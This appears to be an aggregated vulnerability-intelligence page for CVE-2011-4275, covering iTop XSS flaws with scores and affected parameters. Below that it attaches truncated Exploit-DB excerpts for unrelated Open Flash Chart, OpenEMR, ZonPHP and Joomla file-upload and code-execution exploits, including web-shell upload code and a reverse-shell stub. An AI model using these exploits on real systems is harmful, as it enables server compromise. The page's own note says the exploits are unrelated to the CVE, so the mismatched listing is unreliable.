CVE-2011-4275
Published 2011-11-26
CVE-2011-4275: Multiple cross-site scripting (XSS) vulnerabilities in iTop (aka IT Operations Portal) 1.1.181 and 1.2.0-RC-282 allow remote attackers to inject arbitrary web…
Priority: P272, medium, 4.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 1.62% (73.1th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in iTop (aka IT Operations Portal) 1.1.181 and 1.2.0-RC-282 allow remote attackers to inject arbitrary web script or HTML via (1) a crafted company name, (2) a crafted database server name, (3) a crafted CSV file, (4) a crafted copy-and-paste action, (5) the auth_user parameter in a suggest_pwd action to UI.php, (6) the c[menu] parameter to UniversalSearch.php, (7) the description parameter in a SearchFormToAdd_document_list action to UI.php, (8) the category parameter in an errors action to audit.php, or (9) the suggest_pwd parameter to UI.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| combodo | itop | — | — |
| combodo | itop | — | — |
Detection & IOCs (extracted from sources)
- XSS via auth_user parameter in a suggest_pwd action to UI.php
- XSS via c[menu] parameter to UniversalSearch.php
- XSS via description parameter in a SearchFormToAdd_document_list action to UI.php
- XSS via category parameter in an errors action to audit.php
- XSS via suggest_pwd parameter to UI.php
- Affected versions are iTop 1.1.181 and 1.2.0-RC-282 only; no operational exploit code or IOCs were present in the source documents for CVE-2011-4275. All other exploit documents (DOC 2–7) relate to unrelated CVEs and software.
CVSS provenance
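| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |
| vulncheck | — | 4.3 | MEDIUM | — |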
GHSA
ghsa_unreviewed·2022-05-14
CVE-2011-4275 [MEDIUM] CWE-79 GHSA-h57m-vxj9-8gpv: Multiple cross-site scripting (XSS) vulnerabilities in iTop (aka IT Operations Portal) 1
VulnCheck
combodo itop Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2011·CVSS 4.3
CVE-2011-4275 [MEDIUM] combodo itop Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Affected: combodo itop
Required Action: Apply remediations or mitigations per vendor instructio
No detection rules found.
Exploit-DB
Open Flash Chart 2 - Arbitrary File Upload (Metasploit)
exploitdb·2013-10-26
CVE-2011-4275 Open Flash Chart 2 - Arbitrary File Upload (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 "Open Flash Chart v2 Arbitrary File Upload",
'Description' => %q{
This module exploits a file upload vulnerability found in Open Flash
Chart version 2. Attackers can abuse the 'ofc_upload_image.php' file
in order to upload and execute malicious PHP files.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Braeden Thomas', # Initial discovery + Piwik PoC
'Gjoko Krstic ', # OpenEMR PoC
'Halim Cruzito', # zonPHP PoC
'Brendan Coles ' # Metasploit
],
'References' =>
[
['BID', '37314'],
['CVE', '2009-4140'],
['OSVDB', '59051'],
['EDB', '10532']
],
'Payload' =>
{
'Space'
Exploit-DB
ZonPHP 2.25 - Remote Code Execution
exploitdb·2013-10-20
CVE-2011-4275 ZonPHP 2.25 - Remote Code Execution
---
# Exploit Title: ZonPHP V2.25 RCE Vulnerability
# Google Dork: intext:"Made by SLAPER"
# Date: 21-10-2013
# Exploit Author: Halim Cruzito
# Vendor Homepage: http://www.slaper.be
# Software Link: http://www.slaper.be/zonPHPv225.zip
# Version: v2.25
# Tested on: Windows 7
# PoC:
";
$headers = array("User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0",
"Content-Type: text/plain");
$rc = curl_init();
curl_setopt($rc, CURLOPT_URL, $url.$path.$filename);
curl_setopt($rc, CURLOPT_HTTPHEADER, $headers);
curl_setopt($rc, CURLOPT_POST, 1);
curl_setopt( $rc, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($rc, CURLOPT_POSTFIELDS, $data);
curl_setopt($rc, CURLOPT_RETURNTRANSFER, 1);
$ex = curl_exec($rc);
curl_close($rc);
$shell
Exploit-DB
Joomla! Component com_civicrm 4.2.2 - Remote Code Injection
exploitdb·2013-04-22
CVE-2011-4275 Joomla! Component com_civicrm 4.2.2 - Remote Code Injection
---
# Exploit Title: joomla component com_civicrm remode code injection exploit
# Google Dork:"Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart"
# Date: 20/04/2013
# Exploit Author: iskorpitx
# Vendor Homepage: http://civicrm.org
# Software Link: http://civicrm.org/blogs/yashodha/announcing-civicrm-422
# Version: [civicrm 4.2.2]
# Tested on: Win8 Pro x64
# CVE : http://www.securityweb.org
exp.php -u http://target.com/ -f post.php
$options = getopt('u:f:');
if(!isset($options['u'], $options['f']))
die("\n Usage example: php jnews.php -u http://target.com/ -f post.php\n
-u http://target.com/ The full path to Joomla!
-f post.php The name of the file to create.\n");
$url = $options['u'];
$fi
Exploit-DB
OpenEMR - Arbitrary '.PHP' File Upload (Metasploit)
exploitdb·2013-02-20
CVE-2011-4275 OpenEMR - Arbitrary '.PHP' File Upload (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "OpenEMR PHP File Upload Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the
ofc_upload_image.php file from the openflashchart library, a malicious user can
upload a file to the tmp-upload-images directory without any authentication, which
results in arbitrary code execution. The module has been tested successfully on
OpenEMR 4.1.1 over Ubuntu 10.04.
},
'License' => MSF_LICENSE,
'Auth
Exploit-DB
OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload
exploitdb·2013-02-13
CVE-2011-4275 OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload
---
$errstr ($errno)\n";
die();
}
function r_shell($sc)
{
for($z = 0; $z Usage: php $argv[0] \n\n";
die();
}
Exploit-DB
Piwik Open Flash Chart - Remote Code Execution
exploitdb·2009-12-17
CVE-2011-4275 Piwik Open Flash Chart - Remote Code Execution
---
Bugtraq ID: 37314
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Dec 14 2009 12:00AM
Updated: Dec 17 2009 06:03PM
Credit: Braeden Thomas
Vulnerable: Piwik Piwik 0.4.3
Piwik Piwik 0.4.2
Piwik Piwik 0.4.1
Piwik Piwik 0.4
Piwik Piwik 0.2.37
Piwik Piwik 0.2.36
Piwik Piwik 0.2.35
Open Web Analytics Open Web Analytics 1.2.0
Open Flash Chart Open Flash Chart 2.0
Open Flash Chart is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.
Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.
Open Flash Chart 2 Beta 1 and Open Flash Chart 2 are vulnerable; other versions may also
No writeups or analysis indexed.
References
- http://www.securityfocus.com/archive/1/520632
- http://www.securityfocus.com/archive/1/520632/100/0/threaded
- http://www.tele-consulting.com/advisories/TC-SA-2011-02.txt
Published: 2011-11-26
Exploited in the wild